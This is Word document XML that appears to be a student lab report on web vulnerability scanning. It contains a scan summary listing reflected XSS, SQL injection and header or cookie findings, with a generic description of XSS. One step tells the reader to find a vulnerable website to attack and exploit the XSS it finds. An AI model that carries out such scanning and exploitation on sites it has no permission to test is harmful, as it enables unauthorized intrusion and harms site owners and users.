          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:noProof/>
          <w:color w:val="000000" w:themeColor="text1"/>
          <w:lang w:eastAsia="en-IN"/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="252F22B1" wp14:editId="1C52A52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943135" w:rsidRDefault="00943135" w:rsidP="00CB6D22">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:b/>
          <w:color w:val="000000" w:themeColor="text1"/>
          <w:sz w:val="28"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w:rsidR="00CB6D22" w:rsidRPr="004750F9" w:rsidRDefault="00CB6D22" w:rsidP="00CB6D22">
      <w:pPr>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lastRenderedPageBreak/>
        <w:t>Find a vulnerable website to attack on and start analyzing it.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00CB6D22" w:rsidRPr="004750F9" w:rsidRDefault="00CB6D22" w:rsidP="00CB6D22">
      <w:pPr>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t xml:space="preserve">Step 3 </w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00CB6D22" w:rsidRPr="004750F9" w:rsidRDefault="00CB6D22" w:rsidP="00CB6D22">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2996ECF7" wp14:editId="1E0D75C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CB6D22" w:rsidRPr="004750F9" w:rsidRDefault="00CB6D22" w:rsidP="00CB6D22">
      <w:pPr>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t>After the scanning is done analyze what type of vulnerabilities it shows it is not necessary all will be true as it has high rate of false positives.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00CB6D22" w:rsidRPr="004750F9" w:rsidRDefault="00CB6D22" w:rsidP="00CB6D22">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056B4588" wp14:editId="7F5732C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B15A7" w:rsidRPr="004750F9" w:rsidRDefault="009B15A7" w:rsidP="00CB6D22">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:color w:val="000000" w:themeColor="text1"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w:rsidR="009B15A7" w:rsidRPr="004750F9" w:rsidRDefault="009B15A7" w:rsidP="00CB6D22">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:color w:val="000000" w:themeColor="text1"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w:rsidR="009B15A7" w:rsidRPr="004750F9" w:rsidRDefault="009B15A7" w:rsidP="00CB6D22">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:color w:val="000000" w:themeColor="text1"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w:rsidR="009B15A7" w:rsidRPr="004750F9" w:rsidRDefault="009B15A7" w:rsidP="00CB6D22">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:color w:val="000000" w:themeColor="text1"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w:rsidR="00CB6D22" w:rsidRPr="004750F9" w:rsidRDefault="00CB6D22" w:rsidP="00CB6D22">
      <w:pPr>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t xml:space="preserve">Step 4 </w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00CB6D22" w:rsidRPr="004750F9" w:rsidRDefault="00CB6D22" w:rsidP="00CB6D22">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4F438A87" wp14:editId="6D264AA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B6D22" w:rsidRPr="004750F9" w:rsidRDefault="00CB6D22" w:rsidP="00CB6D22">
      <w:pPr>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t>Open one vulnerability in browser Exploit it in this case in using Cross site scripting vulnerability</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="001E33B8" w:rsidRPr="004750F9" w:rsidRDefault="001E33B8" w:rsidP="00CB6D22">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:b/>
          <w:color w:val="000000" w:themeColor="text1"/>
          <w:sz w:val="28"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w:rsidR="003C3BE1" w:rsidRPr="004750F9" w:rsidRDefault="003C3BE1" w:rsidP="001E33B8">
      <w:pPr>
        <w:jc w:val="center"/>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:color w:val="000000" w:themeColor="text1"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w:rsidR="009B15A7" w:rsidRPr="004750F9" w:rsidRDefault="009B15A7" w:rsidP="001E33B8">
      <w:pPr>
        <w:pStyle w:val="Heading3"/>
        <w:jc w:val="center"/>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:b/>
          <w:color w:val="000000" w:themeColor="text1"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="004750F9">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:b/>
          <w:color w:val="000000" w:themeColor="text1"/>
        </w:rPr>
        <w:t>Generated on Tue, 28 Nov 2021 11:40:10</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="001E33B8" w:rsidRPr="004750F9" w:rsidRDefault="001E33B8" w:rsidP="001E33B8">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:color w:val="000000" w:themeColor="text1"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:tbl>
      <w:tblPr>
        <w:tblW w:w="3750" w:type="pct"/>
        <w:tblCellSpacing w:w="15" w:type="dxa"/>
        <w:tblCellMar>
          <w:top w:w="15" w:type="dxa"/>
          <w:left w:w="15" w:type="dxa"/>
          <w:bottom w:w="15" w:type="dxa"/>
          <w:right w:w="15" w:type="dxa"/>
        </w:tblCellMar>
        <w:tblLook w:val="04A0" w:firstRow="1" w:lastRow="0" w:firstColumn="1" w:lastColumn="0" w:noHBand="0" w:noVBand="1"/>
      </w:tblPr>
      <w:tblGrid>
        <w:gridCol w:w="3054"/>
        <w:gridCol w:w="3716"/>
      </w:tblGrid>
      <w:tr w:rsidR="004750F9" w:rsidRPr="004750F9" w:rsidTr="001E33B8">
        <w:trPr>
          <w:trHeight w:val="416"/>
          <w:tblCellSpacing w:w="15" w:type="dxa"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="2222" w:type="pct"/>
            <w:shd w:val="clear" w:color="auto" w:fill="666666"/>
            <w:tcMar>
              <w:top w:w="45" w:type="dxa"/>
              <w:left w:w="60" w:type="dxa"/>
              <w:bottom w:w="45" w:type="dxa"/>
              <w:right w:w="60" w:type="dxa"/>
            </w:tcMar>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w:rsidR="009B15A7" w:rsidRPr="004750F9" w:rsidRDefault="009B15A7" w:rsidP="001E33B8">
            <w:pPr>
              <w:jc w:val="cente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Risk Level</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="2711" w:type="pct"/>
            <w:shd w:val="clear" w:color="auto" w:fill="666666"/>
            <w:tcMar>
              <w:top w:w="45" w:type="dxa"/>
              <w:left w:w="60" w:type="dxa"/>
              <w:bottom w:w="45" w:type="dxa"/>
              <w:right w:w="60" w:type="dxa"/>
            </w:tcMar>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w:rsidR="009B15A7" w:rsidRPr="004750F9" w:rsidRDefault="009B15A7" w:rsidP="001E33B8">
            <w:pPr>
              <w:jc w:val="cente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Number of Alerts</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="004750F9" w:rsidRPr="004750F9" w:rsidTr="001E33B8">
        <w:trPr>
          <w:trHeight w:val="582"/>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C2655D" w:rsidP="001E33B8">
            <w:pPr>
              <w:jc w:val="center"/>
              <w:rPr>
                <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
                <w:color w:val="000000" w:themeColor="text1"/>
                <w:sz w:val="28"/>
                <w:szCs w:val="20"/>
              </w:rPr>
            </w:pPr>
            <w:hyperlink r:id="rId11" w:anchor="m__high" w:history="1">
              <w:r w:rsidR="009B15A7" w:rsidRPr="004750F9">
                <w:rPr>
                  <w:rStyle w:val="Hyperlink"/>
                  <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
                  <w:color w:val="000000" w:themeColor="text1"/>
                  <w:sz w:val="28"/>
                  <w:szCs w:val="20"/>
                </w:rPr>
                <w:t>High</w:t>
              </w:r>
            </w:hyperlink>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:shd w:val="clear" w:color="auto" w:fill="E8E8E8"/>
            <w:tcMar>
              <w:top w:w="45" w:type="dxa"/>
              <w:left w:w="60" w:type="dxa"/>
              <w:bottom w:w="45" w:type="dxa"/>
              <w:right w:w="60" w:type="dxa"/>
            </w:tcMar>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w:rsidR="009B15A7" w:rsidRPr="004750F9" w:rsidRDefault="009B15A7" w:rsidP="001E33B8">
            <w:pPr>
              <w:jc w:val="center"/>
              <w:rPr>
                <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
                <w:color w:val="000000" w:themeColor="text1"/>
                <w:sz w:val="28"/>
                <w:szCs w:val="20"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="004750F9">
              <w:rPr>
                <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
                <w:color w:val="000000" w:themeColor="text1"/>
                <w:sz w:val="28"/>
                <w:szCs w:val="20"/>
              </w:rPr>
              <w:t>2</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="004750F9" w:rsidRPr="004750F9" w:rsidTr="001E33B8">
        <w:trPr>
          <w:trHeight w:val="582"/>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C2655D" w:rsidP="001E33B8">
            <w:pPr>
              <w:jc w:val="center"/>
              <w:rPr>
                <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
                <w:color w:val="000000" w:themeColor="text1"/>
                <w:sz w:val="28"/>
                <w:szCs w:val="20"/>
              </w:rPr>
            </w:pPr>
            <w:hyperlink r:id="rId12" w:anchor="m__medium" w:history="1">
              <w:r w:rsidR="009B15A7" w:rsidRPr="004750F9">
                <w:rPr>
                  <w:rStyle w:val="Hyperlink"/>
                  <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
                  <w:color w:val="000000" w:themeColor="text1"/>
                  <w:sz w:val="28"/>
                  <w:szCs w:val="20"/>
                </w:rPr>
                <w:t>Medium</w:t>
              </w:r>
            </w:hyperlink>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:shd w:val="clear" w:color="auto" w:fill="E8E8E8"/>
            <w:tcMar>
              <w:top w:w="45" w:type="dxa"/>
              <w:left w:w="60" w:type="dxa"/>
              <w:bottom w:w="45" w:type="dxa"/>
              <w:right w:w="60" w:type="dxa"/>
            </w:tcMar>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w:rsidR="009B15A7" w:rsidRPr="004750F9" w:rsidRDefault="009B15A7" w:rsidP="001E33B8">
            <w:pPr>
              <w:jc w:val="center"/>
              <w:rPr>
                <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
                <w:color w:val="000000" w:themeColor="text1"/>
                <w:sz w:val="28"/>
                <w:szCs w:val="20"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="004750F9">
              <w:rPr>
                <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
                <w:color w:val="000000" w:themeColor="text1"/>
                <w:sz w:val="28"/>
                <w:szCs w:val="20"/>
              </w:rPr>
              <w:t>3</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="004750F9" w:rsidRPr="004750F9" w:rsidTr="001E33B8">
        <w:trPr>
          <w:trHeight w:val="557"/>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C2655D" w:rsidP="001E33B8">
            <w:pPr>
              <w:jc w:val="center"/>
              <w:rPr>
                <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
                <w:color w:val="000000" w:themeColor="text1"/>
                <w:sz w:val="28"/>
                <w:szCs w:val="20"/>
              </w:rPr>
            </w:pPr>
            <w:hyperlink r:id="rId13" w:anchor="m__low" w:history="1">
              <w:r w:rsidR="009B15A7" w:rsidRPr="004750F9">
                <w:rPr>
                  <w:rStyle w:val="Hyperlink"/>
                  <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
                  <w:color w:val="000000" w:themeColor="text1"/>
                  <w:sz w:val="28"/>
                  <w:szCs w:val="20"/>
                </w:rPr>
                <w:t>Low</w:t>
              </w:r>
            </w:hyperlink>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:shd w:val="clear" w:color="auto" w:fill="E8E8E8"/>
            <w:tcMar>
              <w:top w:w="45" w:type="dxa"/>
              <w:left w:w="60" w:type="dxa"/>
              <w:bottom w:w="45" w:type="dxa"/>
              <w:right w:w="60" w:type="dxa"/>
            </w:tcMar>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w:rsidR="009B15A7" w:rsidRPr="004750F9" w:rsidRDefault="009B15A7" w:rsidP="001E33B8">
            <w:pPr>
              <w:jc w:val="center"/>
              <w:rPr>
                <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
                <w:color w:val="000000" w:themeColor="text1"/>
                <w:sz w:val="28"/>
                <w:szCs w:val="20"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="004750F9">
              <w:rPr>
                <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
                <w:color w:val="000000" w:themeColor="text1"/>
                <w:sz w:val="28"/>
                <w:szCs w:val="20"/>
              </w:rPr>
              <w:t>8</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="004750F9" w:rsidRPr="004750F9" w:rsidTr="001E33B8">
        <w:trPr>
          <w:trHeight w:val="606"/>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C2655D" w:rsidP="001E33B8">
            <w:pPr>
              <w:jc w:val="center"/>
              <w:rPr>
                <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
                <w:color w:val="000000" w:themeColor="text1"/>
                <w:sz w:val="28"/>
                <w:szCs w:val="20"/>
              </w:rPr>
            </w:pPr>
            <w:hyperlink r:id="rId14" w:anchor="m__info" w:history="1">
              <w:r w:rsidR="009B15A7" w:rsidRPr="004750F9">
                <w:rPr>
                  <w:rStyle w:val="Hyperlink"/>
                  <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
                  <w:color w:val="000000" w:themeColor="text1"/>
                  <w:sz w:val="28"/>
                  <w:szCs w:val="20"/>
                </w:rPr>
                <w:t>Informational</w:t>
              </w:r>
            </w:hyperlink>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:shd w:val="clear" w:color="auto" w:fill="E8E8E8"/>
            <w:tcMar>
              <w:top w:w="45" w:type="dxa"/>
              <w:left w:w="60" w:type="dxa"/>
              <w:bottom w:w="45" w:type="dxa"/>
              <w:right w:w="60" w:type="dxa"/>
            </w:tcMar>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w:rsidR="009B15A7" w:rsidRPr="004750F9" w:rsidRDefault="009B15A7" w:rsidP="001E33B8">
            <w:pPr>
              <w:jc w:val="center"/>
              <w:rPr>
                <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
                <w:color w:val="000000" w:themeColor="text1"/>
                <w:sz w:val="28"/>
                <w:szCs w:val="20"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="004750F9">
              <w:rPr>
                <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
                <w:color w:val="000000" w:themeColor="text1"/>
                <w:sz w:val="28"/>
                <w:szCs w:val="20"/>
              </w:rPr>
              <w:t>4</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
    </w:tbl>
    <w:p w:rsidR="00D348F6" w:rsidRPr="004750F9" w:rsidRDefault="00D348F6" w:rsidP="009B15A7">
      <w:pPr>
        <w:pStyle w:val="Heading3"/>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:b/>
          <w:color w:val="000000" w:themeColor="text1"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w:rsidR="00D348F6" w:rsidRPr="004750F9" w:rsidRDefault="00D348F6" w:rsidP="009B15A7">
      <w:pPr>
        <w:pStyle w:val="Heading3"/>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:b/>
          <w:color w:val="000000" w:themeColor="text1"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w:rsidR="00D348F6" w:rsidRPr="004750F9" w:rsidRDefault="00D348F6" w:rsidP="009B15A7">
      <w:pPr>
        <w:pStyle w:val="Heading3"/>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:b/>
          <w:color w:val="000000" w:themeColor="text1"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w:rsidR="00D348F6" w:rsidRPr="004750F9" w:rsidRDefault="00D348F6" w:rsidP="00D348F6">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:color w:val="000000" w:themeColor="text1"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w:rsidR="009B15A7" w:rsidRPr="004750F9" w:rsidRDefault="009B15A7" w:rsidP="009B15A7">
      <w:pPr>
        <w:pStyle w:val="Heading3"/>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lastRenderedPageBreak/>
        <w:t>Alerts</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="001E33B8" w:rsidRPr="004750F9" w:rsidRDefault="001E33B8" w:rsidP="001E33B8">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:color w:val="000000" w:themeColor="text1"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:tbl>
      <w:tblPr>
        <w:tblW w:w="5418" w:type="pct"/>
        <w:tblCellSpacing w:w="15" w:type="dxa"/>
        <w:tblCellMar>
          <w:top w:w="15" w:type="dxa"/>
          <w:left w:w="15" w:type="dxa"/>
          <w:bottom w:w="15" w:type="dxa"/>
          <w:right w:w="15" w:type="dxa"/>
        </w:tblCellMar>
        <w:tblLook w:val="04A0" w:firstRow="1" w:lastRow="0" w:firstColumn="1" w:lastColumn="0" w:noHBand="0" w:noVBand="1"/>
      </w:tblPr>
      <w:tblGrid>
        <w:gridCol w:w="4036"/>
        <w:gridCol w:w="1360"/>
        <w:gridCol w:w="4385"/>
      </w:tblGrid>
      <w:tr w:rsidR="004750F9" w:rsidRPr="004750F9" w:rsidTr="00D348F6">
        <w:trPr>
          <w:trHeight w:val="288"/>
          <w:tblCellSpacing w:w="15" w:type="dxa"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="2040" w:type="pct"/>
            <w:shd w:val="clear" w:color="auto" w:fill="666666"/>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Name</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="680" w:type="pct"/>
            <w:shd w:val="clear" w:color="auto" w:fill="666666"/>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Risk Level</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="2219" w:type="pct"/>
            <w:shd w:val="clear" w:color="auto" w:fill="666666"/>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Number of Instances</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Cross Site Scripting (Reflected)</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High</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SQL Injection</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High</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Application Error Disclosure</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Medium</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1</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Vulnerable JS Library</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Medium</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5</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X-Frame-Options Header Not Set</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Medium</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42</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Absence of Anti-CSRF Tokens</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3127</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Cookie No HttpOnly Flag</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2</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Cookie Without SameSite Attribute</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2</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Cookie Without Secure Flag</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2</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Cross-Domain JavaScript Source File Inclusion</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Incomplete or No Cache-control and Pragma HTTP Header Set</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17</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Server Leaks Information via "X-Powered-By" HTTP Response Header Field(s)</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49</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X-Content-Type-Options Header Missing</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Low</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116</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Charset Mismatch (Header Versus Meta Content-Type Charset)</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Informational</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6</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Information Disclosure - Suspicious Comments</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Informational</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9</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="004750F9" w:rsidRPr="004750F9" w:rsidTr="00D348F6">
        <w:trPr>
          <w:tblCellSpacing w:w="15" w:type="dxa"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>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Timestamp Disclosure - Unix</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>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Informational</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="2219" w:type="pct"/>
            <w:shd w:val="clear" w:color="auto" w:fill="E8E8E8"/>
            <w:tcMar>
              <w:top w:w="45" w:type="dxa"/>
              <w:left w:w="60" w:type="dxa"/>
              <w:bottom w:w="45" w:type="dxa"/>
              <w:right w:w="60" w:type="dxa"/>
            </w:tcMar>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w:rsidR="009B15A7" w:rsidRPr="004750F9" w:rsidRDefault="009B15A7" w:rsidP="009B15A7">
            <w:pPr>
              <w:jc w:val="cente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31055</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
    </w:tbl>
    <w:p w:rsidR="00D348F6" w:rsidRPr="004750F9" w:rsidRDefault="00D348F6" w:rsidP="009B15A7">
      <w:pPr>
        <w:pStyle w:val="Heading3"/>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:color w:val="000000" w:themeColor="text1"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w:rsidR="00D348F6" w:rsidRPr="004750F9" w:rsidRDefault="00D348F6" w:rsidP="00D348F6">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:color w:val="000000" w:themeColor="text1"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w:rsidR="00D348F6" w:rsidRPr="004750F9" w:rsidRDefault="00D348F6" w:rsidP="00D348F6">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:color w:val="000000" w:themeColor="text1"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w:rsidR="00D348F6" w:rsidRPr="004750F9" w:rsidRDefault="00D348F6" w:rsidP="00D348F6">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:color w:val="000000" w:themeColor="text1"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w:rsidR="00D348F6" w:rsidRPr="004750F9" w:rsidRDefault="00D348F6" w:rsidP="00D348F6">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:color w:val="000000" w:themeColor="text1"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w:rsidR="00D348F6" w:rsidRPr="004750F9" w:rsidRDefault="00D348F6" w:rsidP="00D348F6">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:color w:val="000000" w:themeColor="text1"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w:rsidR="00D348F6" w:rsidRPr="004750F9" w:rsidRDefault="00D348F6" w:rsidP="009B15A7">
      <w:pPr>
        <w:pStyle w:val="Heading3"/>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:color w:val="000000" w:themeColor="text1"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w:rsidR="001E33B8" w:rsidRPr="004750F9" w:rsidRDefault="001E33B8" w:rsidP="001E33B8">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:color w:val="000000" w:themeColor="text1"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w:rsidR="009B15A7" w:rsidRPr="004750F9" w:rsidRDefault="009B15A7" w:rsidP="009B15A7">
      <w:pPr>
        <w:pStyle w:val="Heading3"/>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:b/>
          <w:color w:val="000000" w:themeColor="text1"/>
          <w:sz w:val="32"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="004750F9">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:b/>
          <w:color w:val="000000" w:themeColor="text1"/>
          <w:sz w:val="32"/>
        </w:rPr>
        <w:lastRenderedPageBreak/>
        <w:t>Alert Detail</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2045"/>
        <w:gridCol w:w="105"/>
        <w:gridCol w:w="6876"/>
      </w:tblGrid>
      <w:tr w:rsidR="004750F9" w:rsidRPr="004750F9" w:rsidTr="001E33B8">
        <w:trPr>
          <w:trHeight w:val="288"/>
          <w:tblCellSpacing w:w="15" w:type="dxa"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1153" w:type="pct"/>
            <w:gridSpan w:val="2"/>
            <w:shd w:val="clear" w:color="auto" w:fill="FF0000"/>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b/>
                <w:bCs/>
                <w:color w:val="000000" w:themeColor="text1"/>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
              </w:rPr>
            </w:pPr>
            <w:bookmarkStart w:id="1" w:name="m__high" w:colFirst="0" w:colLast="0"/>
            <w:r w:rsidRPr="004750F9">
              <w:rPr>
                <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
                <w:b/>
                <w:bCs/>
                <w:color w:val="000000" w:themeColor="text1"/>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
              </w:rPr>
              <w:t>High (Medium)</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="3797" w:type="pct"/>
            <w:shd w:val="clear" w:color="auto" w:fill="FF0000"/>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Cross Site Scripting (Reflected)</w:t>
            </w:r>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Description</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pStyle w:val="NormalWeb"/>
              <w:rPr>
                <w:color w:val="000000" w:themeColor="text1"/>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="004750F9">
              <w:rPr>
                <w:color w:val="000000" w:themeColor="text1"/>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
              </w:rPr>
              <w:t>Cross-site Scripting (XSS) is an attack technique that involves echoing attacker-supplied code into a user's browser instance. A browser instance can be a standard web browser client, or a browser object embedded in a software product such as the browser within WinAmp, an RSS reader, or an email client. The code itself is usually written in HTML/JavaScript, but may also extend to VBScript, ActiveX, Java, Flash, or any other browser-supported technology.</w:t>
            </w:r>
          </w:p>
          <w:p w:rsidR="009B15A7" w:rsidRPr="004750F9" w:rsidRDefault="009B15A7" w:rsidP="009B15A7">
            <w:pPr>
              <w:pStyle w:val="NormalWeb"/>
              <w:rPr>
                <w:color w:val="000000" w:themeColor="text1"/>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="004750F9">
              <w:rPr>
                <w:color w:val="000000" w:themeColor="text1"/>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
              </w:rPr>
              <w:t>When an attacker gets a user's browser to execute his/her code, the code will run within the security context (or zone) of the hosting web site. With this level of privilege, the code has the ability to read, modify and transmit any sensitive data accessible by the browser. A Cross-site Scripted user could have his/her account hijacked (cookie theft), their browser redirected to another location, or possibly shown fraudulent content delivered by the web site they are visiting. Cross-site Scripting attacks essentially compromise the trust relationship between a user and the web site. Applications utilizing browser object instances which load content from the file system may execute code under the local machine zone allowing for system compromise.</w:t>
            </w:r>
          </w:p>
          <w:p w:rsidR="009B15A7" w:rsidRPr="004750F9" w:rsidRDefault="009B15A7" w:rsidP="009B15A7">
            <w:pPr>
